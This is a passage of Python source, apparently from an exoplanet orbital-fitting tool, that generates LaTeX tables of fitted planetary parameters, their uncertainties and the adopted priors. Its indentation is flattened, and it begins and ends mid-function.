\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
elif asymmetric == True:
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i], obj.param_errors.planet_params_errors[7*i][0], obj.param_errors.planet_params_errors[7*i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +1], obj.param_errors.planet_params_errors[7*i +1][0], obj.param_errors.planet_params_errors[7*i +1][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +2], obj.param_errors.planet_params_errors[7*i +2][0], obj.param_errors.planet_params_errors[7*i +2][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +3], obj.param_errors.planet_params_errors[7*i +3][0], obj.param_errors.planet_params_errors[7*i +3][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["RV"]== True or obj.type_fit["TTV"]== True:
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +4], obj.param_errors.planet_params_errors[7*i +4][0], obj.param_errors.planet_params_errors[7*i +4][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +5], obj.param_errors.planet_params_errors[7*i +5][0], obj.param_errors.planet_params_errors[7*i +5][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.params.planet_params[7*i +6], obj.param_errors.planet_params_errors[7*i +6][0], obj.param_errors.planet_params_errors[7*i +6][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.t0[i], obj.t0_err[i][0], obj.t0_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_rad[i], obj.pl_rad_err[i][0], obj.pl_rad_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.pl_a[i], obj.pl_a_err[i][0], obj.pl_a_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$a$ [au]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.a[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$m \sin i$ [$M_{\\rm jup}$]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(obj.fit_results.mass[i], 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$t_{\omega}$ [day]", width = 30)
for i in range(obj.npl):
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format((float(obj.epoch) - (np.radians(obj.params.planet_params[7*i + 4])/(2*np.pi))*obj.params.planet_params[7*i + 1] ), 0,0, width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.linear_trend),float(obj.param_errors.linear_trend_error[0]),float(obj.param_errors.linear_trend_error[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.rv_quadtr),float(obj.rv_quadtr_err[0]),float(obj.rv_quadtr_err[1]) , width = width, width2 = 0, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.offsets[i]), obj.param_errors.offset_errors[i][0], obj.param_errors.offset_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.params.jitters[i]), obj.param_errors.jitter_errors[i][0], obj.param_errors.jitter_errors[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_off[i]), obj.tra_off_err[i][0], obj.tra_off_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s"%(i+1), width = 30)
text = text + '''& {0:{width}.{precision}f}$_{{-{1:{width2}.{precision}f}}}^{{+{2:{width2}.{precision}f}}}$ '''.format(float(obj.tra_jitt[i]), obj.tra_jitt_err[i][0], obj.tra_jitt_err[i][1], width = width, width2 = 0, precision = precision)
text = text + '''\\\\ \\noalign{\\vskip 0.9mm}
'''
text = text + '''{0:{width}s}'''.format("$\chi^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\chi_{\\nu}^2$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.reduced_chi2), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$rms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.rms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$wrms$ [m\,s$^{-1}$]", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.wrms), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$-\ln\mathcal{L}$", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(float(obj.fit_results.loglik), width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("N$_{\\rm RV}$ data", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(len(obj.fit_results.jd), width = width, precision = 0)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Epoch", width = 30)
text = text + '''& {0:{width}.{precision}f} '''.format(obj.epoch, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''
\end{tabular}
% \end{minipage}}
% \end{adjustwidth}
%\\tablefoot{\small }
\end{table}
'''
else:
print("asymmetric must be True or False")
return
if return_text == True:
return text
else:
table_file = open(file_name, 'w')
table_file.write(text)
table_file.close()
print("Done")
return
def latex_prior_table(obj, width = 10, precision = 2, file_name='prior_table.tex', path='./', return_text = False):
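    """
    Build a LaTeX table of the adopted priors (note added for clarity): for
    each fitted parameter the prior is printed as N(mean, sigma^2) for a
    normal prior, J(a, b) for a Jeffreys prior, or U(a, b) for plain uniform
    bounds, with one column per planet for the planetary parameters.  If
    return_text is True the LaTeX source is returned as a string, otherwise
    it is written to file_name.
    """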
text = '''
\\begin{table}[ht]
% \\begin{adjustwidth}{-4.0cm}{}
% \\resizebox{0.69\\textheight}{!}
% {\\begin{minipage}{1.1\\textwidth}
\centering
\caption{{}}
\label{table:}
\\begin{tabular}{lrrrrrrrr} % 2 columns
\hline\hline \\noalign{\\vskip 0.7mm}
'''
text = text + '''Parameter \hspace{0.0 mm}'''
for i in range(obj.npl):
text = text + '''& Planet %s '''%chr(98+i)
text = text + '''\\\\
\hline \\noalign{\\vskip 0.7mm}
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$K$ [m\,s$^{-1}$]", width = 30)
for i in range(obj.npl):
if obj.K_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.K_norm_pr[i][0],obj.K_norm_pr[i][1],"$^2$"
elif obj.K_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.K_jeff_pr[i][0],obj.K_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.K_bound[i][0],obj.K_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$P$ [day]", width = 30)
for i in range(obj.npl):
if obj.P_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.P_norm_pr[i][0],obj.P_norm_pr[i][1],"$^2$"
elif obj.P_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.P_jeff_pr[i][0],obj.P_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.P_bound[i][0],obj.P_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.hkl == False:
text = text + '''{0:{width}s}'''.format("$e$ ", width = 30)
for i in range(obj.npl):
if obj.e_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_norm_pr[i][0],obj.e_norm_pr[i][1],"$^2$"
elif obj.e_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_jeff_pr[i][0],obj.e_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_bound[i][0],obj.e_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.w_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.w_norm_pr[i][0],obj.w_norm_pr[i][1],"$^2$"
elif obj.w_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.w_jeff_pr[i][0],obj.w_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.w_bound[i][0],obj.w_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"] == True or obj.type_fit["TTV"] == True :
text = text + '''{0:{width}s}'''.format("$M_{\\rm 0}$ [deg]", width = 30)
for i in range(obj.npl):
if obj.M0_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.M0_norm_pr[i][0],obj.M0_norm_pr[i][1],"$^2$"
elif obj.M0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.M0_jeff_pr[i][0],obj.M0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.M0_bound[i][0],obj.M0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.hkl == True:
text = text + '''{0:{width}s}'''.format("$e\sin(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_sinw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_sinw_norm_pr[i][0],obj.e_sinw_norm_pr[i][1],"$^2$"
elif obj.e_sinw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_sinw_jeff_pr[i][0],obj.e_sinw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_sinw_bound[i][0],obj.e_sinw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$e\cos(\omega)$ ", width = 30)
for i in range(obj.npl):
if obj.e_cosw_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.e_cosw_norm_pr[i][0],obj.e_cosw_norm_pr[i][1],"$^2$"
elif obj.e_cosw_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.e_cosw_jeff_pr[i][0],obj.e_cosw_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.e_cosw_bound[i][0],obj.e_cosw_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\lambda$ [deg]", width = 30)
for i in range(obj.npl):
if obj.lamb_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.lamb_norm_pr[i][0],obj.lamb_norm_pr[i][1],"$^2$"
elif obj.lamb_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.lamb_jeff_pr[i][0],obj.lamb_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.lamb_bound[i][0],obj.lamb_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.mod_dynamical == True:
text = text + '''{0:{width}s}'''.format("$i$ [deg]", width = 30)
for i in range(obj.npl):
if obj.i_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.i_norm_pr[i][0],obj.i_norm_pr[i][1],"$^2$"
elif obj.i_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.i_jeff_pr[i][0],obj.i_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.i_bound[i][0],obj.i_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$\Omega$ [deg]", width = 30)
for i in range(obj.npl):
if obj.Node_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.Node_norm_pr[i][0],obj.Node_norm_pr[i][1],"$^2$"
elif obj.Node_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.Node_jeff_pr[i][0],obj.Node_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.Node_bound[i][0],obj.Node_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"] == True:
text = text + '''{0:{width}s}'''.format("$t_{\\rm 0}$ [day]", width = 30)
for i in range(obj.npl):
            if obj.t0_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.t0_norm_pr[i][0],obj.t0_norm_pr[i][1],"$^2$"
elif obj.t0_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.t0_jeff_pr[i][0],obj.t0_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.t0_bound[i][0],obj.t0_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("Pl.Rad. [$R_\odot$]", width = 30)
for i in range(obj.npl):
if obj.pl_rad_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_rad_norm_pr[i][0],obj.pl_rad_norm_pr[i][1],"$^2$"
elif obj.pl_rad_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_rad_jeff_pr[i][0],obj.pl_rad_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_rad_bound[i][0],obj.pl_rad_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("$a$ [$R_\odot$]", width = 30)
for i in range(obj.npl):
if obj.pl_a_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.pl_a_norm_pr[i][0],obj.pl_a_norm_pr[i][1],"$^2$"
elif obj.pl_a_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.pl_a_jeff_pr[i][0],obj.pl_a_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.pl_a_bound[i][0],obj.pl_a_bound[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["RV"]== True:
text = text + '''{0:{width}s}'''.format("RV lin. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_lintr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_lintr_norm_pr[i][0],obj.rv_lintr_norm_pr[i][1],"$^2$"
elif obj.rv_lintr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_lintr_jeff_pr[i][0],obj.rv_lintr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_lintr_bounds[i][0],obj.rv_lintr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
text = text + '''{0:{width}s}'''.format("RV quad. trend [m\,s$^{-1}$\,day$^{-1}$]", width = 30)
i = 0
if obj.rv_quadtr_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rv_quadtr_norm_pr[i][0],obj.rv_quadtr_norm_pr[i][1],"$^2$"
elif obj.rv_quadtr_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rv_quadtr_jeff_pr[i][0],obj.rv_quadtr_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rv_quadtr_bounds[i][0],obj.rv_quadtr_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.rvoff_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.rvoff_norm_pr[i][0],obj.rvoff_norm_pr[i][1],"$^2$"
elif obj.rvoff_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.rvoff_jeff_pr[i][0],obj.rvoff_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.rvoff_bounds[i][0],obj.rvoff_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(obj.filelist.ndset):
text = text + '''{0:{width}s}'''.format("RV$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.jitt_norm_pr[i][0],obj.jitt_norm_pr[i][1],"$^2$"
elif obj.jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.jitt_jeff_pr[i][0],obj.jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.jitt_bounds[i][0],obj.jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.doGP == True:
if obj.gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_rot_str[i]), width = 30)
if obj.GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_rot_norm_pr[i][0],obj.GP_rot_norm_pr[i][1],"$^2$"
elif obj.GP_rot_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_rot_jeff_pr[i][0],obj.GP_rot_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_rot_bounds[i][0],obj.GP_rot_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
elif obj.gp_kernel == 'SHOKernel':
for i in range(3):
text = text + '''{0:{width}s}'''.format("%s"%(obj.GP_sho_str[i]), width = 30)
if obj.GP_sho_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.GP_sho_norm_pr[i][0],obj.GP_sho_norm_pr[i][1],"$^2$"
elif obj.GP_sho_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.GP_sho_jeff_pr[i][0],obj.GP_sho_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.GP_sho_bounds[i][0],obj.GP_sho_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.type_fit["Transit"]== True:
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm off}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_off_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_off_norm_pr[i][0],obj.tra_off_norm_pr[i][1],"$^2$"
elif obj.tra_off_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_off_jeff_pr[i][0],obj.tra_off_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_off_bounds[i][0],obj.tra_off_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
for i in range(10):
if len(obj.tra_data_sets[i]) != 0:
text = text + '''{0:{width}s}'''.format("Tran.$_{\\rm jit}$ %s [m\,s$^{-1}$]"%(i+1), width = 30)
if obj.tra_jitt_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_jitt_norm_pr[i][0],obj.tra_jitt_norm_pr[i][1],"$^2$"
elif obj.tra_jitt_jeff_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{J}$",obj.tra_jitt_jeff_pr[i][0],obj.tra_jitt_jeff_pr[i][1],""
else:
sign,f_arg,s_arg,pow_arg = "$\mathcal{U}$",obj.tra_jitt_bounds[i][0],obj.tra_jitt_bounds[i][1],""
text = text + '''& {0:s}({1:{width}.{precision}f},{2:{width}.{precision}f}{3:s})'''.format(sign, f_arg,s_arg,pow_arg, width = width, precision = precision)
text = text + '''\\\\
'''
if obj.tra_doGP == True:
if obj.tra_gp_kernel == 'RotKernel':
for i in range(4):
text = text + '''{0:{width}s}'''.format("%s"%(obj.tra_GP_rot_str[i]), width = 30)
if obj.tra_GP_rot_norm_pr[i][2]==True:
sign,f_arg,s_arg,pow_arg = "$\mathcal{N}$",obj.tra_GP_rot_norm_pr[i][0],obj.tra_GP_rot_norm_pr[i][1],"$^2$"
